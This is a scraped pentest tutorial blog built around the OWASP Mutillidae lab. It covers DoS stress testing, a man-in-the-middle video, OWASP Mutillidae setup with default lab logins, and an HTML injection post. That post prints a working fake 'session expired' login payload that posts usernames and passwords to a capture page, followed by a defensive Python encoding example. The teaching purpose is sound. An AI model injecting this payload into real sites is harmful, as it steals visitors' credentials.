<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkN9PNhey2YVpymTSYo1ATEwgB5Pg227uv_iLhCZtJ0m2KG97yz1ttdECa5k0Qse3SMCePmiUQ8cc36xa1ZEvyuiO7tvnHVoKjm6iDN3vjmw2qo4PzOFQAzu6lZ_YlWj9K4V0r2ZrfzgM/s1600/H3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkN9PNhey2YVpymTSYo1ATEwgB5Pg227uv_iLhCZtJ0m2KG97yz1ttdECa5k0Qse3SMCePmiUQ8cc36xa1ZEvyuiO7tvnHVoKjm6iDN3vjmw2qo4PzOFQAzu6lZ_YlWj9K4V0r2ZrfzgM/s1600/H3.png" height="53" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">A view of the outgoing requests during the test...</span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhy0bXFTWJEvj2y2CiaGnEAFTX7e7rnfSBRuQYfg85UttDAuaD5jU10EtTlhqVDSvn7l3kO4A8mXX8Ha7dB4xgHJ_ztQ2L6fx6HoSnLYzFjRPTxo-RM2rk3ldDR9q7xJl_HORQ4QeFSHp8/s1600/H6-1024x248.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhy0bXFTWJEvj2y2CiaGnEAFTX7e7rnfSBRuQYfg85UttDAuaD5jU10EtTlhqVDSvn7l3kO4A8mXX8Ha7dB4xgHJ_ztQ2L6fx6HoSnLYzFjRPTxo-RM2rk3ldDR9q7xJl_HORQ4QeFSHp8/s1600/H6-1024x248.png" height="96" width="400" /></a></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">The normal network and CPU values of the server hosting the site...</span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6oKqr76xeQldnFtcq-vhb7BjAD7P0OajH1-SIydTh-jJS_1JZIfYScELHjSYvtwUR0e5r0P975ZMaiuQ8tOlBJYV3c5rBWoqQcbON-xIRSqzYK5B-TqMzED0EtCxAWQYetkWK_bch0Sg/s1600/H4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6oKqr76xeQldnFtcq-vhb7BjAD7P0OajH1-SIydTh-jJS_1JZIfYScELHjSYvtwUR0e5r0P975ZMaiuQ8tOlBJYV3c5rBWoqQcbON-xIRSqzYK5B-TqMzED0EtCxAWQYetkWK_bch0Sg/s1600/H4.png" height="183" width="320" /></a></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;"><br /></span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">The values while under the stress test...</span></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1emQSGgiaQfdp1_EjH-TElqQs_jwYGUi39VKa_Z9fDmuksICFh1p38OpM23NUCCACUZAeA36w9jJ3K7_4c-CbvIxT6H_CxeRzM4ox8wGV83QjgsMA8nJh9hPVdReHOZdbp_9UWqchFlQ/s1600/H5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1emQSGgiaQfdp1_EjH-TElqQs_jwYGUi39VKa_Z9fDmuksICFh1p38OpM23NUCCACUZAeA36w9jJ3K7_4c-CbvIxT6H_CxeRzM4ox8wGV83QjgsMA8nJh9hPVdReHOZdbp_9UWqchFlQ/s1600/H5.png" height="184" width="320" /></a></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhm6JieW1otS9vPSOF7GtfBwy1GgYy_B630cqGJlB4f02gL8ZwSN0QikVIRUZUijQFx2-gr2Rtf_5SiaxvFV8ViBpFWetJS8LmYXQsZ080bJ8Frfn8r_GYR_64IEusAr8nNjB8aVQaImu4/s1600/H7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhm6JieW1otS9vPSOF7GtfBwy1GgYy_B630cqGJlB4f02gL8ZwSN0QikVIRUZUijQFx2-gr2Rtf_5SiaxvFV8ViBpFWetJS8LmYXQsZ080bJ8Frfn8r_GYR_64IEusAr8nNjB8aVQaImu4/s1600/H7.png" /></a></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
As can be seen, CPU and network traffic have increased significantly. Sites should always be stress-tested, and measures taken against HTTP DoS attacks or situations that produce an equivalent result.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-49840942742870598632014-10-10T11:30:00.001+03:002014-12-05T10:06:24.119+02:00 Man in the Middle Attack In this video, how a <b>man in the middle</b> attack is carried out was shown, and the network structure resulting from the interception attack was examined using Wireshark.<br />
<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="350" src="https://www.youtube.com/embed/rBdvphkoTDc" width="650"></iframe>Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-28427563459697995212014-10-10T10:01:00.001+03:002014-10-10T13:35:35.202+03:00 HTML Injection Attack on a Comment Field The HTML injection vulnerability arises from input fields on web sites that allow users to enter HTML code fragments inside comments. However innocent these fields look, they are very important to attackers. Depending on the structure of the attack, many different HTML snippets can be added to these fields to obtain the information of members and visitors. Chief among these, the cookie data of visitors and members can be stolen.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgz8dbpxbqNPVC1fmy_zW5xtKKbcldDvzr9JXWKlxaXx07MrD7H9gzzYO0TMq6MP0RVTLWf4mIGLI2Kk4i0kDh_RFecFcb05HdPpOfEynkYqsDRPNCnx9UAGd6Kkb7ufYtYcXQtdd-CdX8/s1600/h1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgz8dbpxbqNPVC1fmy_zW5xtKKbcldDvzr9JXWKlxaXx07MrD7H9gzzYO0TMq6MP0RVTLWf4mIGLI2Kk4i0kDh_RFecFcb05HdPpOfEynkYqsDRPNCnx9UAGd6Kkb7ufYtYcXQtdd-CdX8/s1600/h1.png" height="193" width="400" /></a></div>
<br />
<br />
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Let's look at this example.</span><br />
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"></span><br />
<a name='more'></a><span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwM5IWGhztHTNoFfg0VnuF3CGIrCDekeRGqM1XKcCYUI1SRH3VlQ2FQBwBGMWFMGyi7GPe64assTh-h0kblSqLmtZhSVR1HhURW-E9F2GFxkeJcvmsrKZqNhaBXekxE0Q5JhwJkeE26tI/s1600/h2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwM5IWGhztHTNoFfg0VnuF3CGIrCDekeRGqM1XKcCYUI1SRH3VlQ2FQBwBGMWFMGyi7GPe64assTh-h0kblSqLmtZhSVR1HhURW-E9F2GFxkeJcvmsrKZqNhaBXekxE0Q5JhwJkeE26tI/s1600/h2.png" height="206" width="400" /></a></div>
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">In the image above, the hacker sends the cookie data to his own page. In the example below, however, visitors are shown a login screen as if their session had expired or been renewed, and are asked for their username and password.</span><br />
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9BJZiYpRTNShsQKqh9pLmGTgu3ANa_AcdDBPek7jwi63xipIwIa7uvz8HnRC7Kt-q3iwag0hLmReEg7__5blXOgTFv77AmzTI9EIWywk-H4X2XV-zkOENNc6VPYobMtTNw4OzqFNhW-Q/s1600/h3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9BJZiYpRTNShsQKqh9pLmGTgu3ANa_AcdDBPek7jwi63xipIwIa7uvz8HnRC7Kt-q3iwag0hLmReEg7__5blXOgTFv77AmzTI9EIWywk-H4X2XV-zkOENNc6VPYobMtTNw4OzqFNhW-Q/s1600/h3.png" height="195" width="400" /></a></div>
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span>
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span>
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">Let's see its output below. If the Submit button's function sends the username and password to the desired server, the member's credentials are stolen. Visitors' membership credentials can be stolen through a simple comment field.</span><br />
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkQqHFMqLXbRb7oINsWS9bQnWIN8m0_n1IqFNrVc3r_Lg0GTOBbXmqxXELuiCnou5vAuPbcrZTsljL3NU3c9EsAjVW862LXR2Y_qNNTbn9q5XcGbyZGPuSndLfzHAiyfsZBkYy34q-hNA/s1600/h4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkQqHFMqLXbRb7oINsWS9bQnWIN8m0_n1IqFNrVc3r_Lg0GTOBbXmqxXELuiCnou5vAuPbcrZTsljL3NU3c9EsAjVW862LXR2Y_qNNTbn9q5XcGbyZGPuSndLfzHAiyfsZBkYy34q-hNA/s1600/h4.png" height="280" width="400" /></a></div>
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span>
<br />
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
The JavaScript-HTML code is as follows.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<div id="modal" style="position:fixed;top:0;left:0;width:100%;height:100%;background-color:black;opacity:.5;z-index:999998;">&nbsp;</div><br />
<div style="margin:5% auto;width:100%;position:fixed;top:5%;left:5%;z-index:9999999;"><br />
<div id="idlogin" style="width:405px;position:relative;margin:0 auto;background-color:white;padding:10px;border:1px solid black;"><br />
<script><br />
function capture(theForm){<br />
var lXMLHTTP;<br />
try{<br />
var lData = "username=" + theForm.username.value + "&password=" + theForm.password.value;<br />
var lHost = "localhost";<br />
var lProtocol = "http";<br />
var lAction = lProtocol + "://" + lHost + "/mutillidae/capture-data.php";<br />
var lMethod = "post";<br />
try{<br />
lXMLHTTP = new ActiveXObject("Msxml2.XMLHTTP");<br />
}catch (e){<br />
try{<br />
lXMLHTTP = new ActiveXObject("Microsoft.XMLHTTP");<br />
}catch(e) {<br />
try{<br />
lXMLHTTP = new XMLHttpRequest();<br />
}catch (e) {</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
};//end try<br />
};//end try<br />
};//end try</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
lXMLHTTP.onreadystatechange = function(){</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br />
if(lXMLHTTP.readyState == 4){<br />
theForm.parentNode.style.display="none";<br />
}// end if<br />
};</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
lXMLHTTP.open(lMethod, lAction, true);<br />
lXMLHTTP.setRequestHeader("Host", lHost);<br />
lXMLHTTP.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");<br />
lXMLHTTP.send(lData);<br />
}catch(e){</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
alert(e.message);</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
//THIS LINE IS TESTING AND DEMONSTRATION ONLY. DO NOT INCLUDE IN PEN TEST.<br />
};</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
};//end function<br />
</script><br />
<form><br />
<table style="font-weight:bold;"><br />
<tbody></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<tr></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<td colspan="2" style="font-size:20px;">Sorry! Your session has expired.<br><br>Please login again.</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
</td></tr><br />
<tr></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<td colspan="2">&nbsp;</div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
</td></tr><br />
<tr><td>Username</td><td><input name="username" type="text"></td></tr><br />
<tr><td>Password</td><td><input name="password" type="password"></td></tr><br />
<tr><td colspan="2" style="text-align:center;"><input type="button" onclick="javascript:capture(this.form);" value=" Submit "></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
</td></tr><br />
</tbody></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
</table><br />
</form><br />
</div></div>
<div style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
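How a comment field stops being an injection point, as an added example that is not part of the original post: the same constructed comment is rendered without and with output encoding, then parsed to list any live form, input or event-handler markup. The function names and the sample comment are assumptions for the illustration.

```python
import html
from html.parser import HTMLParser

# Elements that should never appear inside a stored visitor comment.
ACTIVE_TAGS = {"script", "form", "input", "button", "iframe", "object", "embed"}
URL_ATTRS = {"href", "src", "action", "formaction"}

# Constructed comment shaped like the fake "session expired" login box above.
SAMPLE_COMMENT = (
    'Nice post!<form>Sorry! Your session has expired.'
    '<input name="username" type="text">'
    '<input name="password" type="password">'
    '<input type="button" onclick="capture(this.form)" value="Submit"></form>'
)


def render_comment_vulnerable(author, text):
    """Before: visitor input is concatenated into the page as markup."""
    return f'<div class="comment"><b>{author}</b>: {text}</div>'


def render_comment_safe(author, text):
    """After: visitor input is HTML-encoded, so the browser shows it as text."""
    return (f'<div class="comment"><b>{html.escape(author, quote=True)}</b>: '
            f'{html.escape(text, quote=True)}</div>')


class ActiveContentFinder(HTMLParser):
    """Collects tags and attributes that make rendered markup interactive."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_TAGS:
            self.findings.append(tag)
        for name, value in attrs:
            if name.startswith("on"):            # onclick, onerror, ...
                self.findings.append(f"{tag}[{name}]")
            elif name in URL_ATTRS and (value or "").strip().lower().startswith("javascript:"):
                self.findings.append(f"{tag}[{name}=javascript:]")


def find_active_content(markup):
    """Return the list of active elements/attributes a browser would honour."""
    finder = ActiveContentFinder()
    finder.feed(markup)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    for render in (render_comment_vulnerable, render_comment_safe):
        page = render("visitor42", SAMPLE_COMMENT)
        print(render.__name__, "->", find_active_content(page) or "no active content")
```

The same checker can run as a regression test over every template that prints stored user input.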
<span style="background-color: white; color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;"><br /></span>Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-77028426192766484842014-09-30T11:13:00.000+03:002016-02-05T21:51:57.901+02:00 What Is OWASP? Installing and Using the OWASP Web Application-1<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<a data-mce-href="http://fbhportal.com/mutillidae" href="http://fbhportal.com/mutillidae">OWASP</a> is short for Open Web Application Security Project. It is a community founded to combat the problems caused by insecure software. All of OWASP's tools, documents, lists and chapters are offered free of charge to everyone who works in or is curious about software security.</div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
OWASP is not affiliated with any technology company and was founded to meet the needs of the OWASP community. The top 10 vulnerability list for 2013 is shown below.</div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge_fS9WYdlDDFXQR0gUTIZzNZRBrrF-gc74j8ck2H3WmXrneWVJarmJY8AbzJloSw-UjXx4RMwfgSzTA7RgyQrodZSqkH7qFVdsQQDkF9cCTUXDOpekw0Rw4RuJXyPHKy14RFUmC61Lec/s1600/o1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="208" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge_fS9WYdlDDFXQR0gUTIZzNZRBrrF-gc74j8ck2H3WmXrneWVJarmJY8AbzJloSw-UjXx4RMwfgSzTA7RgyQrodZSqkH7qFVdsQQDkF9cCTUXDOpekw0Rw4RuJXyPHKy14RFUmC61Lec/s1600/o1.png" width="400" /></a></div>
<a name='more'></a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong>OWASP</strong> built this web application both to introduce the vulnerabilities encountered in web applications and to provide a test environment for people working to gain experience in penetration testing.</div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Compared with the DVWA web test application, it is more comprehensive and has richer documentation. In addition, OWASP enriches the web application by updating the vulnerabilities it contains.</div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong>Installing the OWASP Web Application</strong></div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
1- Download the mutillidae zip file <a data-mce-href="http://sourceforge.net/projects/mutillidae/files/mutillidae-project/" href="http://sourceforge.net/projects/mutillidae/files/mutillidae-project/" target="_blank">from this address</a>.</div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
2- Download the XAMPP server program <a data-mce-href="https://www.apachefriends.org/download.html" href="https://www.apachefriends.org/download.html" target="_blank">from this address</a>.</div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
3- After XAMPP is installed, copy the <strong>mutillidae</strong> folder extracted from the .zip into the <strong>httpd</strong> folder.</div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
4- Go to <strong>http://localhost/mutillidae</strong> and click the<strong> Setup/reset the database</strong> link.</div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXCEgk6LuqG27xr588henfbo1ofFbC6d04oBjC6FmQ3UMYl_QM6kD4zzWiDiTRSXWc67zgO-SyRcs7L4X3s-_AqR_oTWZpVxJWa9Dwm25m58kbWEWLklS2Iyc_zTW35YTVDYovki8Qte0/s1600/o2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXCEgk6LuqG27xr588henfbo1ofFbC6d04oBjC6FmQ3UMYl_QM6kD4zzWiDiTRSXWc67zgO-SyRcs7L4X3s-_AqR_oTWZpVxJWa9Dwm25m58kbWEWLklS2Iyc_zTW35YTVDYovki8Qte0/s1600/o2.png" width="400" /></a></div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">5- Go to </span><strong style="background-color: white;">http://localhost/mutillidae</strong><span style="background-color: white;"> again; the application is now installed.</span></div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9v_5bqaW1x5pfEJKL5JlkYe8aFglOmKzR1yATmvFpDx5D19ZdamFIBH1tbwKtaeCMXuKtAzi8LE2HWNXa0I4T4oVV8TDWAGOIeOICKWQYPl2ZirfQmeR_J9iU81IaWhJHO4e-cRLhn9c/s1600/o3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="183" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9v_5bqaW1x5pfEJKL5JlkYe8aFglOmKzR1yATmvFpDx5D19ZdamFIBH1tbwKtaeCMXuKtAzi8LE2HWNXa0I4T4oVV8TDWAGOIeOICKWQYPl2ZirfQmeR_J9iU81IaWhJHO4e-cRLhn9c/s1600/o3.png" width="400" /></a></div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;"><br /></span></div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong>User list for logging in</strong></div>
<ol style="color: #333333; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<li>'admin', 'adminpass'</li>
<li>'adrian', 'somepassword'</li>
<li>'john', 'monkey'</li>
<li>'ed', 'pentest'</li>
</ol>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<strong>Installation with WAMP Server:</strong></div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
Install WAMP Server and create a database named<strong> "nowasp"</strong> from the database section. Copy the folder extracted from the zip into the <strong>/www</strong> folder.</div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3DblGu1ShiWPo_SdS1WG-VTWDOLkFMBVx5AYt3CFm_N9TztWAAN3rI6T-BYn1zNJPblRmelYs9NLXcCJ34dE_1pF_U5vj_DtxJ_v7kj0IDdePncjIvM-5LU-DUrBOQz9XgEQb3cRv8yA/s1600/o4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3DblGu1ShiWPo_SdS1WG-VTWDOLkFMBVx5AYt3CFm_N9TztWAAN3rI6T-BYn1zNJPblRmelYs9NLXcCJ34dE_1pF_U5vj_DtxJ_v7kj0IDdePncjIvM-5LU-DUrBOQz9XgEQb3cRv8yA/s1600/o4.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;">If you get an error like the one above, go to "</span><strong style="background-color: white;">C:\wamp\www\mutillidae1\classes</strong><span style="background-color: white;">" and, in the </span><strong style="background-color: white;">MySQlHandler.php</strong><span style="background-color: white;"> file, find the field shown in the image below, </span><strong style="background-color: white;">"static public $mMySQLDatabasePassword = " "; "</strong><span style="background-color: white;">, and enter the </span><strong style="background-color: white;">MYSQL</strong><span style="background-color: white;"> password there.</span></div>
<div data-mce-style="color: #4b5d67;" style="color: #4b5d67; font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 13px; line-height: 19px;">
<span style="background-color: white;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
